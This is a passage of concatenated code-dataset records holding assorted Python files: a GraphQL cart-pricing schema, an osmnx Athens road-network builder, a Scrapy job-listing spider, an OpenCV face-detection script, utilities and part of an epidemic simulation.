(deal_product.price, sale_price)\n\n return list(dbproducts.values())\n\n @staticmethod\n def calculate_cart_price(cart, product_quantity,\n product_pricing, product_packagedeal):\n for product in product_quantity:\n original_price, sale_price = product_pricing[product]\n quantity = product_quantity[product]\n\n pay_quantity = quantity\n # A product may or may not have an associated package deal\n if product in product_packagedeal:\n deal = product_packagedeal[product]\n\n discounted = int(quantity / deal.minimumQuantity)\n discounted *= deal.paidQuantity\n discounted = int(discounted)\n\n remainder = quantity % deal.minimumQuantity\n\n pay_quantity = discounted + remainder\n product_pricing[product] = (\n original_price,\n (sale_price * pay_quantity) / quantity\n )\n\n cart.totalBeforeDiscount += original_price * quantity\n cart.total += sale_price * pay_quantity\n\n @staticmethod\n def processcart(products):\n # Create empty cart type\n cart = CartType(totalBeforeDiscount=0,\n totalDiscount=0,\n total=0)\n\n product_quantity = {\n item['product']: item['quantity']\n for item in products\n }\n product_pricing = {}\n product_packagedeal = {}\n\n # Finding package deals and percent sales\n cart.items = CartType.find_sale_details(\n product_quantity, product_pricing,\n product_packagedeal\n )\n\n # At this point we have all information on the products\n CartType.calculate_cart_price(\n cart, product_quantity, product_pricing,\n product_packagedeal\n )\n\n for item in cart.items:\n key = str(item.product.id)\n item.unitPrice = product_pricing[key][1]\n item.originalPrice = product_pricing[key][0]\n\n cart.totalDiscount = cart.totalBeforeDiscount - cart.total\n\n return cart\n\n\nclass LoginResultType(graphene.ObjectType):\n user = graphene.Field(UserType)\n success = graphene.Boolean()\n token = graphene.String()\n\n\nclass ReceiptType(graphene.ObjectType):\n cart = graphene.Field(CartType)\n success = graphene.Boolean()\n\n\nclass FilterInputType(graphene.InputObjectType):\n text = graphene.String(required=False)\n minPrice = graphene.Float(required=False)\n maxPrice = graphene.Float(required=False)\n category = graphene.List(graphene.ID, required=False)\n onSale = graphene.Boolean(required=False)\n organic = 
graphene.Boolean(required=False)\n","sub_path":"src/products/schema_types.py","file_name":"schema_types.py","file_ext":"py","file_size_in_byte":5705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"467746211","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 17 17:23:52 2015\n\n@author: root\n\"\"\"\n\nimport sys\nimport logging\n\nimport settings\nimport feature_engineering\nfrom ml_model import ML_Model\nimport submission_writer\n\n# configure logging\nlogger = logging.getLogger(\"submission_pipeline\")\n\nhandler = logging.FileHandler(settings.LOG_PATH)\nhandler.setFormatter(logging.Formatter(\n '%(asctime)s %(levelname)s %(name)s: %(message)s'))\n\nlogger.addHandler(handler)\nlogger.setLevel(logging.DEBUG)\n\n\n# Feature engineer ( Transform features and create new ones )\nlogger.info('Start Feature Engineering')\nfe = feature_engineering.FeatureEngineer( False )\ntest_data = fe.engineer_features( settings.GLOBAL_TEST, settings.PROCESSED_GLOBAL )\n\n#test_data.drop( settings.ID_FIELD, inplace=True, axis=1 )\n\n# Train model and evaluate \nlogger.info('Train and Evaluate Model')\nmodel = ML_Model()\nmodel.load_model()\nids, prediction = model.predict_submission()\n\nsubmission_writer.create_submission( ids, prediction )","sub_path":"Submission_Pipeline.py","file_name":"Submission_Pipeline.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600113525","text":"import dateutil.parser  # required by test_datetime below\nfrom datetime import datetime\n\n\nclass DataTypeUtils:\n\n @staticmethod\n def identify_data_type(element):\n if element is None:\n return None\n\n def test_float(elm):\n assert (\".\" in elm), \"does not contain decimal separator\"\n return float(elm)\n\n def test_bool(elm):\n trues = (\"true\", \"True\")\n falses = (\"false\", \"False\")\n\n if elm in trues:\n return True\n elif elm in falses:\n return False\n else:\n raise ValueError(\"is neither true nor false\")\n\n def test_datetime(text):\n try:\n return dateutil.parser.parse(text)\n except:\n\n datetime_formats = (\n '%Y-%m-%dT%H: %M: %SZ', # strava\n )\n\n for fmt in datetime_formats:\n try:\n return datetime.strptime(text, fmt)\n except ValueError as e:\n pass\n\n raise ValueError('no valid date format found')\n\n # even though it is a string,\n # it might really be an int or float\n # so if string verify!!\n if isinstance(element, str):\n conv_functions = {\n float: test_float,\n int: lambda elm: int(elm),\n datetime: test_datetime,\n str: lambda elm: str(elm),\n bool: test_bool\n }\n\n order = [float, int, datetime, bool, str]\n\n for typ in order:\n try:\n # try the converting function of that type\n # if it doesn't fail, that's our type\n return conv_functions[typ](element)\n except (ValueError, AssertionError) as e:\n pass\n\n # if nothing else works, return as string\n return str(element)\n\n elif isinstance(element, (float, int, bool)):\n # otherwise just return the element unchanged\n return element\n","sub_path":"MetaDataApi/metadata/utils/common_utils/data_type_utils.py","file_name":"data_type_utils.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"221972856","text":"\"\"\"\nCreated on Wed Oct 9 14:10:17 2019\n\n@author: Joachim Landtmeters\nBuilding the graph of Athens network by using osmnx package\n\"\"\"\n\nimport osmnx as ox\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nfrom 
matplotlib.collections import LineCollection\nimport networkx as nx\nimport pandas as pd\nimport geopandas as gpd\nfrom collections import Counter, OrderedDict\nfrom shapely.geometry import Point, LineString\nfrom operator import itemgetter\nfrom statistics import mean\nimport numpy as np\nfrom pylab import *\nimport pickle\nimport json\n\n# north, south, east, west = 37.9936, 37.9738, 23.7424, 23.7201 Coordinates for Athens region\nbb = 37.9936, 37.9738, 23.7424, 23.7201\n# custom filter to include pedestrian streets\nadj_filter = '[\"area\"!~\"yes\"][\"highway\"!~\"cycleway|footway|path|steps' \\\n'|track|corridor|elevator|escalator|proposed|construction|bridleway' \\\n'|abandoned|platform|raceway\"][\"motor_vehicle\"!~\"no\"][\"motorcar\"!~\"no\"]' \\\n'[\"access\"!~\"private\"][\"service\"!~\"parking|parking_aisle|private|emergency_access\"]'\n\n\nclass CreateNetwork:\n\n def __init__(self, bounding_box, network_type='drive_service', crs='epsg:4326', tags=None, simplify_strict=False,\n traffic_signals=True, custom_filter=None):\n # researched area (bounding box)\n self.bounding_box = bounding_box\n self.network_type = network_type\n self.custom_filter = custom_filter\n self.strict = simplify_strict\n self.tags = tags\n self.crs = crs\n if tags is None:\n self.tags = ['bridge', 'tunnel', 'oneway', 'lanes', 'ref', 'name',\n 'highway', 'busway:both', 'busway:left', 'busway:right',\n 'maxspeed', 'service', 'access', 'area',\n 'landuse', 'width', 'est_width', 'junction', 'surface']\n # download the road network from OSM\n ox.settings.useful_tags_path = self.tags\n if custom_filter:\n self.graph = ox.graph_from_bbox(self.bounding_box[0], self.bounding_box[1], self.bounding_box[2],\n self.bounding_box[3], custom_filter=self.custom_filter\n , simplify=self.strict)\n else:\n self.graph = ox.graph_from_bbox(self.bounding_box[0], self.bounding_box[1], self.bounding_box[2],\n self.bounding_box[3], network_type=self.network_type , simplify=self.strict)\n if not self.strict:\n self.graph = ox.simplify_graph(self.graph, strict=False)\n self.graph_latlon = ox.project_graph(self.graph, to_crs=self.crs)\n if traffic_signals:\n\n with open('export.geojson') as f: # Traffic signals in bounding box extracted via Overpass Turbo query\n ts = json.load(f)\n\n df_ts = pd.DataFrame(ts['features'])\n dict_traffic_signals = {'coordinates': [], 'highway': [], 'geometry': []}\n for ind, val in df_ts.iterrows():\n for i, j in enumerate(df_ts):\n if j == 'properties':\n dict_traffic_signals['highway'].append(val[j]['highway'])\n if j == 'geometry':\n dict_traffic_signals['coordinates'].append(val[j]['coordinates'])\n dict_traffic_signals['geometry'].append(Point(val[j]['coordinates'][0],\n val[j]['coordinates'][1]))\n self.traffic_signals = gpd.GeoDataFrame(dict_traffic_signals, geometry=dict_traffic_signals['geometry'])\n self.network_matrix = pd.DataFrame()\n\n def network_dfs(self, print_info=False):\n G = self.graph_latlon\n new_graph = ox.add_edge_bearings(G)\n edge_bus_lanes_left = list(new_graph.edges.data('busway:left', default=False))\n edge_bus_lanes_right = list(new_graph.edges.data('busway:right', default=False))\n left = [j[2] for i, j in enumerate(edge_bus_lanes_left)]\n right = [j[2] for i, j in enumerate(edge_bus_lanes_right)]\n n, e = ox.graph_to_gdfs(new_graph)\n e = e.assign(dbl_left=left)\n e = e.assign(dbl_right=right)\n e = e.drop(['busway:left', 'busway:right'], axis=1)\n dbl_bool = np.logical_and(e['dbl_left'].values, e['oneway'].values)\n gdf_val = e[['u', 'v', 'bearing']].values\n new_rows = 
[]\n new_index = len(e)\n for row, val in e.iterrows():\n if dbl_bool[row]:\n if print_info:\n print(row)\n new_row = val.copy()\n new_row['u'] = int(gdf_val[row][1])\n new_row['v'] = int(gdf_val[row][0])\n new_row['lanes'] = 1\n new_row['bearing'] = gdf_val[row][2] - 180\n new_row['osmid'] = 'new_edge'\n new_row['geometry'] = [LineString([n['geometry'][gdf_val[row][1]],\n n['geometry'][gdf_val[row][0]]])]\n # print(dict(new_row), dict(val))\n new_row = gpd.GeoDataFrame(dict(new_row), index=[new_index])\n new_index += 1\n new_rows.append(new_row)\n if new_rows:\n new_rows = pd.concat(new_rows, axis=0)\n if print_info:\n print(new_rows)\n e = pd.concat([e, new_rows], axis=0)\n new_graph = ox.gdfs_to_graph(n, e)\n n, e = ox.graph_to_gdfs(new_graph)\n network_matrix = e.loc[:,\n ['u', 'v', 'oneway', 'osmid', 'highway', 'length', 'bearing', 'geometry', 'lanes',\n 'dbl_left', 'dbl_right']]\n network_nodes_small = n.loc[:, ['y', 'x']]\n else:\n network_matrix = e.loc[:,\n ['u', 'v', 'oneway', 'osmid', 'highway', 'length', 'bearing', 'geometry', 'lanes',\n 'dbl_left', 'dbl_right']]\n network_nodes_small = n.loc[:, ['y', 'x']]\n network_matrix = network_matrix.join(network_nodes_small, on='u')\n network_matrix = network_matrix.rename(columns={'u': 'N1', 'y': 'Lat1', 'x': 'Long1'})\n network_matrix = network_matrix.join(network_nodes_small, on='v')\n network_matrix = network_matrix.rename(columns={'v': 'N2', 'y': 'Lat2', 'x': 'Long2'})\n cols = ['osmid', 'N1', 'Lat1', 'Long1', 'N2', 'Lat2', 'Long2', 'length', 'lanes', 'oneway', 'bearing', 'highway'\n , 'dbl_left', 'dbl_right', 'geometry']\n network_matrix = network_matrix[cols] # rearranging columns (reader's convenience)\n network_matrix.reset_index(inplace=True) # From hereon the unique index of an edge is just its position in df\n self.graph_latlon = new_graph\n self.graph = ox.project_graph(self.graph_latlon)\n self.network_matrix = network_matrix\n return network_matrix, new_graph, new_rows\n\n def link_traffic_signals_to_edge(self):\n G = self.graph_latlon\n gdf_netw = self.network_matrix\n gdf_ts = self.traffic_signals\n lon = [j[0] for i, j in gdf_ts['coordinates'].iteritems()]\n lat = [j[1] for i, j in gdf_ts['coordinates'].iteritems()]\n nearest = ox.get_nearest_edges(G, lon, lat, method='balltree')\n nearest = [tuple(j) for i, j in enumerate(nearest)]\n gdf_ts['edge'] = nearest\n gdf_ts['N1'] = [j[0] for i, j in enumerate(nearest)]\n gdf_ts['N2'] = [j[1] for i, j in enumerate(nearest)]\n df_ts_e = pd.merge(gdf_netw[['N1', 'N2', 'geometry']], gdf_ts[['N1', 'N2']], how='inner',\n on=['N1', 'N2'])\n return df_ts_e\n\n def plot_dbl(self):\n network_matrix = self.network_matrix\n fig, ax = plt.subplots()\n network_matrix.plot(ax=ax, edgecolor='lightgrey')\n network_matrix[network_matrix['dbl_left'] == 'opposite_lane']. \\\n plot(ax=ax, edgecolor='r', linewidth=3, label='DBL: Contra flow')\n network_matrix[network_matrix['dbl_left'] == 'opposite_way']. 
\\\n plot(ax=ax, edgecolor='r', linewidth=3)\n network_matrix[network_matrix['dbl_right'] == 'lane'].plot(ax=ax, edgecolor='g', linewidth=3,\n label='DBL: With flow')\n network_matrix[(network_matrix['dbl_right'] == 'lane') & (network_matrix['dbl_left'] == 'opposite_lane')].plot(\n ax=ax, edgecolor='purple', linewidth=3, label='DBL: Both directions')\n network_matrix[(network_matrix['dbl_right'] == 'lane') & (network_matrix['dbl_left'] == 'opposite_way')].plot(\n ax=ax, edgecolor='purple', linewidth=3)\n ax.legend(loc='upper left')\n fig.suptitle('Dedicated bus lanes in Athens research area')\n plt.show()\n\n def plot_network_lanes(self):\n # Plot graph with number of lanes, colours for categorisation of roads\n G = self.graph_latlon\n edge_lanes = list(G.edges.data('lanes', default='0.5'))\n n_lanes = [x[2] for x in edge_lanes]\n for num, i in enumerate(n_lanes):\n t = type(i)\n if t is list:\n n_lanes[num] = [float(y) for y in n_lanes[num]]\n n_lanes[num] = mean(n_lanes[num])\n print(num)\n else:\n n_lanes[num] = float(n_lanes[num])\n n_lanes = [float(x) for x in n_lanes]\n ## Creating a pos_list based on longitude and latitude\n labels = nx.get_edge_attributes(G, 'lanes')\n colors = ['lightgrey', 'r', 'k', 'pink', 'blue', 'orange', 'g', 'm', 'c', 'darkred', 'pink']\n keys = list(Counter(n_lanes).keys())\n keys.sort()\n col_dict = OrderedDict(zip(keys, colors))\n print(col_dict)\n lane_colors = [col_dict[x] for x in n_lanes]\n fig, ax = ox.plot_graph(G, edge_linewidth=n_lanes, edge_color=lane_colors,\n show=False, close=False, node_size=1, fig_height=7, fig_width=7, margin=0)\n markersize = 6\n legend_elements = [0] * len(keys)\n for k, v in col_dict.items():\n idx = keys.index(k)\n if float(k) < 1:\n label = 'NaN'\n idx = 0\n elif float(k) == 1:\n label = ' 1 lane'\n idx = 1\n elif float(k) > int(k):\n label = f'{int(k)} to {int(k)+1} lanes (list)'\n else:\n label = f'{int(k)} lanes'\n legend_elements[idx] = Line2D([0], [0], marker='s', color=\"#061529\", label=label,\n markerfacecolor=col_dict[k], markersize=markersize)\n ax.legend(handles=legend_elements, frameon=True, framealpha=0.7, loc='lower left',\n fontsize=6)\n fig.suptitle('Athens network with colors and width of edges wrt lanes')\n plt.show()\n\n def save_graph_to_shp(self):\n network_nodes, _ = ox.graph_to_gdfs(self.graph_latlon)\n network_matrix_shp = self.network_matrix.copy()\n network_nodes_shp = network_nodes.copy()\n network_matrix_shp.crs = 'epsg:4326'\n network_nodes_shp.crs = 'epsg:4326'\n ox.save_load.save_gdf_shapefile(network_matrix_shp, filename=\"athens_network\", folder=\"athens\")\n ox.save_load.save_gdf_shapefile(network_nodes_shp, filename=\"athens_nodes\", folder=\"athens\")\n\n\n\n# Show network with strict and non-strict simplification\n# ox.plot_graph(research_area, show=False, close=False)\n# plt.title('Strict simplification')\n# ox.plot_graph(research_area_nonstrict, show=False, close=False)\n# plt.title('Non-strict simplification')\n\n# Projection to Lat-Long in WGS-84\n\n\n# Add edge bearings as attribute and build matrix with nodes of edges and their respective Lat-Long coordinates\n\n\"\"\" \nwith open('network_matrix_it2_nonstrict.pkl', 'wb') as g:\n pickle.dump(network_matrix, g)\n\nwith open('athens_network_it2_nonstrict.pkl', 'wb') as h:\n pickle.dump(athens_graph, h)\n\"\"\"","sub_path":"create_network.py","file_name":"create_network.py","file_ext":"py","file_size_in_byte":11962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} 
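A note on the bearing arithmetic in network_dfs above: the reversed contra-flow edge is assigned `bearing - 180`, which goes negative for bearings below 180 degrees. A minimal sketch of a normalized reversal in plain Python, with no osmnx dependency (the helper name reverse_bearing is ours, not part of the record above):

def reverse_bearing(bearing):
    # map the opposite direction into [0, 360), so 90 -> 270 and 270 -> 90
    return (bearing + 180) % 360

assert reverse_bearing(90) == 270
assert reverse_bearing(270.0) == 90.0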
+{"seq_id":"347063581","text":"from hashlib import sha1\nfrom datetime import datetime\n\nfrom sqlalchemy.dialects.postgresql import JSONB\nfrom werkzeug.datastructures import MultiDict\n\nfrom aleph.core import db\nfrom aleph.model.entity import Entity\nfrom aleph.model.validation import validate\nfrom aleph.model.common import SoftDeleteModel\n\n\ndef extract_query(q):\n \"\"\"Remove parts of the query which do not affect the result set.\"\"\"\n q = MultiDict(q)\n cleaned = MultiDict()\n for key in q.keys():\n values = q.getlist(key)\n if key == 'q':\n values = [v.strip() for v in values]\n if key.startswith('filter:') or key in ['entity', 'q']:\n for val in values:\n if not isinstance(val, (list, tuple, set)):\n val = [val]\n for v in val:\n if v is None:\n continue\n v = unicode(v).lower()\n if len(v):\n cleaned.add(key, v)\n return cleaned\n\n\ndef query_signature(q):\n \"\"\"Generate a SHA1 signature for the given query.\"\"\"\n q = extract_query(q)\n out = sha1()\n for field in q.keys():\n out.update('::' + field.encode('utf-8'))\n for value in set(sorted(q.getlist(field))):\n out.update('==' + value.encode('utf-8'))\n return out.hexdigest()\n\n\nclass Alert(db.Model, SoftDeleteModel):\n \"\"\"A subscription to notifications on a given query.\"\"\"\n\n __tablename__ = 'alert'\n\n id = db.Column(db.Integer, primary_key=True)\n role_id = db.Column(db.Integer, db.ForeignKey('role.id'), index=True)\n custom_label = db.Column(db.Unicode, nullable=True)\n signature = db.Column(db.Unicode)\n query = db.Column(JSONB)\n notified_at = db.Column(db.DateTime, nullable=True)\n\n @property\n def label(self):\n if self.custom_label is not None:\n return self.custom_label\n # This is weird. Should live somewhere else.\n fragments = []\n q = self.query.get('q')\n if q and len(q):\n fragments.append('matching \"%s\"' % ''.join(q))\n entities = self.query.get('entity')\n if entities and len(entities):\n try:\n entities = Entity.by_id_set(entities)\n sub_fragments = []\n for entity in entities.values():\n sub_fragments.append('\"%s\"' % entity.name)\n fragment = ' and '.join(sub_fragments)\n fragments.append('mentioning %s' % fragment)\n except:\n pass\n for key in self.query.keys():\n try:\n if not key.startswith('filter:'):\n continue\n _, field = key.split(':', 1)\n # TODO: source_id special handling?\n field = field.replace('_', ' ')\n value = '; '.join(self.query.get(key))\n fragments.append('filtered by %s: %s' % (field, value))\n except:\n pass\n if not len(fragments):\n return 'Everything'\n return 'Results %s' % ', '.join(fragments)\n\n def delete(self):\n self.deleted_at = datetime.utcnow()\n db.session.add(self)\n db.session.flush()\n\n def update(self):\n self.notified_at = datetime.utcnow()\n db.session.add(self)\n db.session.flush()\n\n @classmethod\n def by_id(cls, id, role=None):\n q = cls.all().filter_by(id=id)\n if role is not None:\n q = q.filter(cls.role_id == role.id)\n return q.first()\n\n @classmethod\n def by_role(cls, role):\n return cls.all().filter(cls.role_id == role.id)\n\n @classmethod\n def create(cls, data, role):\n validate(data, 'alert.json#')\n alert = cls()\n alert.role_id = role.id\n q = extract_query(data.get('query'))\n alert.query = {k: q.getlist(k) for k in q.keys()}\n alert.signature = query_signature(q)\n alert.custom_label = data.get('custom_label')\n alert.update()\n return alert\n\n @classmethod\n def exists(cls, query, role):\n q = cls.all_ids().filter(cls.role_id == role.id)\n q = q.filter(cls.signature == query_signature(query))\n return q.scalar()\n\n 
def __repr__(self):\n return '<Alert(%r, %r)>' % (self.id, self.query)\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'label': self.label,\n 'custom_label': self.custom_label,\n 'signature': self.signature,\n 'role_id': self.role_id,\n 'notified_at': self.notified_at,\n 'query': self.query,\n 'created_at': self.created_at,\n 'updated_at': self.updated_at\n }\n","sub_path":"aleph/model/alert.py","file_name":"alert.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"407658286","text":"import os, sys\nimport math\nimport datetime\n\n#\n# set_timecode\n# time : 0 - 24\n\ndef get_day(day):\n search_day = day\n if day == 'Today' :\n search_day = datetime.datetime.today().weekday() # today's weekday (Mon-Sun: 0-6)\n return search_day\n\n\ndef get_time(time):\n search_time = time\n if time == 'Now' :\n search_time = datetime.datetime.now().strftime('%H') # current time\n return search_time\n\n\ndef get_timecode(time_set):\n search_time = time_set\n\n wcode = datetime.datetime.now().strftime('%w')\n if int(wcode) == 0 : wcode = '7'\n\n now_time = datetime.datetime.now().strftime('%H') # current time\n if search_time == 'now' : search_time = now_time\n\n if len(str(search_time)) == 1 : search_time = '0'+str(search_time)\n else : search_time = str(search_time)\n\n timecode = wcode+search_time\n\n return timecode\n\ndef check_item(item, name) :\n if ( name in item ) and (item[name] is not None) :\n return True\n return False\n\n## Util Function\ndef get_distance_from_coordinates(x0, y0, x1, y1):\n x_ = float(x0)\n y_ = float(y0)\n _x = float(x1)\n _y = float(y1)\n\n p = 0.017453292519943295\n a = 0.5 - math.cos((_y - y_) * p)/2 + math.cos(y_ * p) * math.cos(_y * p) * (1 - math.cos((_x - x_) * p)) / 2\n return 12742 * math.asin(math.sqrt(a))\n\n\ndef progress_bar (iteration, total, prefix = '', suffix = '', decimals = 1, barLength = 100):\n\n formatStr = \"{0:.\" + str(decimals) + \"f}\"\n percent = formatStr.format(100 * (iteration / float(total)))\n filledLength = int(round(barLength * iteration / float(total)))\n\n bar = '#' * filledLength + '-' * (barLength - filledLength)\n\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percent, '%', suffix)),\n\n if iteration == total:\n sys.stdout.write('\\n')\n\n sys.stdout.flush()\n\n\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\ndef allowed_file(filename):\n return '.' 
in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n","sub_path":"flask/app/util/CommonUtil.py","file_name":"CommonUtil.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"44053138","text":"\"\"\"\nTimesJobsAE spider created on the top of ATSSpider\n\nscrapy crawl timesjobs_ae -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://ae.timesjobs.com/\"\n\nSample URL:\n http://ae.timesjobs.com/\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import ConvertDateString, NormalizedJoin, Prefix, Replace, ShrinkURL\n\npattern = {\n 'pager': compile(r'getNextPageResult\\((\\d+),(\\d+)\\)'),\n}\n\n\nclass TimesJobsAE(ATSSpider):\n\n name = 'timesjobs_ae'\n\n def parse(self, response):\n sel = Selector(response)\n # parse country\n for country_href in sel.xpath(\n '//section[@class=\"gulf-loc\"]/div/ul/li/a/@href'\n ).extract():\n yield Request(\n callback=self.parse_jobs_list,\n url=urljoin(response.url, country_href)\n )\n\n def parse_jobs_list(self, response):\n sel = Selector(response)\n\n for href in sel.xpath(\n '//div/ul[@class=\"joblist\"]/li[contains(@class, \"joblistli\")]//h2/a/@href'\n ).extract():\n yield Request(\n callback=self.parse_job_callback(),\n url=urljoin(response.url, href)\n )\n # pagination\n page_query = sel.xpath(\n '//div/div[@id=\"searchResultPagincationQuery\"]/text()'\n ).extract()\n next_page = sel.xpath(\n '//div[contains(@class, \"srp-pagination\")]//em[@class=\"active\"]/following-sibling::em[1]/a/@onclick'\n ).extract()\n if next_page:\n match = pattern['pager'].search(next_page[0])\n if match:\n next_page = '?from=submit&%(page_query)s&sequence=%(page_num)s&startPage=%(start)s' % {\n 'page_query': page_query[0],\n 'page_num': match.group(1),\n 'start': match.group(2),\n }\n yield Request(\n callback=self.parse_jobs_list,\n url=urljoin(response.url, next_page)\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n sel = Selector(response)\n\n loader = BrightcorpItemLoader(selector=sel)\n\n loader.add_xpath(\n 'title',\n '//section[contains(@class, \"jd-preview\")]/header/h1/text()'\n )\n loader.add_xpath(\n 'location',\n '//ul/li/label[contains(text(), \"Location\")]/following-sibling::span[1]/text()'\n )\n loader.add_xpath(\n 'referencenumber',\n '//div[@class=\"posting-dtl\"]/span[@class=\"job-id\"]/text()',\n Replace('Job ID: '),\n Prefix('%s-' % self.name)\n )\n loader.add_xpath(\n 'date',\n '//div[@class=\"posting-dtl\"]/span[@class=\"pstd-on\"]/text()',\n Replace('Posted on: '),\n ConvertDateString('%d %b, %Y')\n )\n loader.add_xpath(\n 'company',\n '//section[contains(@class, \"jd-preview\")]/header/span[@class=\"jd-comp-name\"]/text()'\n )\n loader.add_xpath(\n 'company_description',\n '//section[@class=\"about-hiring-comp\"]'\n )\n loader.add_value('url', response.url, ShrinkURL(['txtKeywords']))\n loader.add_xpath(\n 'description',\n '//section[@class=\"job-discription\"]'\n )\n loader.add_xpath(\n 'baseSalary',\n '//ul/li/label[contains(text(), \"Salary\")]/following-sibling::span[1]/text()'\n )\n loader.add_xpath(\n 'experiencerequirements',\n '//ul/li/label[contains(text(), \"Experience\")]/following-sibling::span[1]/text()'\n )\n loader.add_xpath(\n 
'jobcategory',\n '//ul/li/label[contains(text(), \"Job Function\")]/following-sibling::span[1]/text()'\n )\n loader.add_xpath(\n 'industry',\n '//ul/li/label[contains(text(), \"Industry\")]/following-sibling::span[1]/text()'\n )\n loader.add_xpath(\n 'educationrequirements',\n '//ul/li/label[contains(text(), \"Qualification:\")]/following-sibling::span[1]//text()',\n NormalizedJoin(', ')\n )\n loader.add_value('apply_url', response.url, ShrinkURL(['txtKeywords']))\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/timesjobs_ae.py","file_name":"timesjobs_ae.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"597594070","text":"import cv2\r\nimport numpy as np\r\n\r\nface_Cascade= cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n\r\ncap=cv2.VideoCapture(0)\r\n\r\n# create the writer once, outside the loop, so the output file is not re-created on every frame;\r\n# the frame size passed here must match the capture resolution for frames to be written\r\nvideo_writer = cv2.VideoWriter(\"output.avi\", cv2.VideoWriter_fourcc(*'XVID'), 20, (680, 480))\r\n\r\nwhile True:\r\n ret,img = cap.read()\r\n gray= cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n faces = face_Cascade.detectMultiScale(gray,scaleFactor=1.3,minNeighbors=5,minSize=(30,30))\r\n for(x,y,w,h) in faces:\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\r\n roi_gray = gray[y:y+h,x:x+w]\r\n roi_color = img[y:y+h,x:x+w]\r\n cv2.imshow('video',img)\r\n\r\n k= cv2.waitKey(30) & 0xff\r\n if k== 27:\r\n break\r\n\r\nwhile (cap.isOpened()):\r\n ret, frame = cap.read()\r\n if ret:\r\n video_writer.write(frame)\r\n cv2.imshow('Video Stream', frame)\r\n if cv2.waitKey(1) & 0xff == 27:\r\n break\r\n else:\r\n break\r\ncap.release()\r\nvideo_writer.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"Python.py","file_name":"Python.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"143717698","text":"import random\nimport copy\nimport numpy as np\nimport ReadFile\n\nclass Simulate():\n\tdef __init__(self,config_obj,model,policy_list,event_restriction_fn,agents_obj,locations_obj):\n\t\tself.agents_obj=agents_obj\n\t\tself.locations_obj=locations_obj\n\t\tself.model=model\n\t\tself.policy_list=policy_list\n\t\tself.event_restriction_fn=event_restriction_fn\n\t\tself.config_obj=config_obj\n\n\tdef onStartSimulation(self):\n\n\t\t#Initialize state list\n\t\tself.state_list={}\n\t\tself.state_history={}\n\t\tfor state in self.model.individual_state_types:\n\t\t\tself.state_list[state]=[]\n\t\t\tself.state_history[state]=[]\n\n\t\t#Initialize states\n\t\tself.model.initalize_states(self.agents_obj.agents)\n\n\t\t#Reset Policies\n\t\tfor policy in self.policy_list:\n\t\t\tpolicy.reset()\n\n\t\t#Update State list\n\t\tfor agent in self.agents_obj.agents.values():\n\t\t\tself.state_list[agent.state].append(agent.index)\n\n\t\t#Store state list\n\t\tself.store_state()\n\n\tdef onStartTimeStep(self, interactionFiles_listOfList, eventFiles_listOfList, current_time_step):\n\t\tself.current_time_step=current_time_step\n\n\t\tfor agent in self.agents_obj.agents.values():\n\t\t\tagent.new_time_step()\n\n\t\tfor location in self.locations_obj.locations.values():\n\t\t\tlocation.new_time_step()\n\n\t\t# Initialize filenames\n\t\tinteractions_filename = events_filename = None\n\n\t\t# Load interactions\n\t\tfor interactionFiles_list in interactionFiles_listOfList:\n\t\t\tif interactionFiles_list != []:\n\t\t\t\tinteractions_filename = interactionFiles_list[current_time_step % 
len(interactionFiles_list)]\n\t\t\t\tReadFile.ReadInteractions(interactions_filename,self.config_obj,self.agents_obj)\n\n\t\t# Load Events\n\t\tfor eventFiles_list in eventFiles_listOfList:\n\t\t\tif eventFiles_list != []:\n\t\t\t\tevents_filename = eventFiles_list[current_time_step % len(eventFiles_list)]\n\t\t\t\tReadFile.ReadEvents(events_filename,self.config_obj,self.locations_obj, self.agents_obj)\n\n\t\t#Enact policies by updating agent and location states.\n\t\tfor policy in self.policy_list:\n\t\t\tpolicy.enact_policy(self.current_time_step, self.agents_obj.agents.values(), self.locations_obj.locations.values(), self.model)\n\n\t\tif events_filename != None:\n\t\t\t#Update event info to agents from location\n\t\t\tfor location in self.locations_obj.locations.values():\n\t\t\t\tif not location.lock_down_state:\n\t\t\t\t\tfor event_info in location.events:\n\t\t\t\t\t\tself.model.update_event_infection(event_info, location, self.agents_obj, self.current_time_step, self.event_restriction_fn)\n\n\tdef handleTimeStepForAllAgents(self):\n\t\t#Too ensure concurrency we update agent.next_state in method handleTimeStepAsAgent\n\t\t#After every agent has updated next_state we update states of all agents in method handleTimeStep()\n\n\t\tfor agent in self.agents_obj.agents.values():\n\t\t\tself.handleTimeStepAsAgent(agent)\n\n\t\tfor agent in self.agents_obj.agents.values():\n\t\t\tself.convert_state(agent)\n\n\tdef 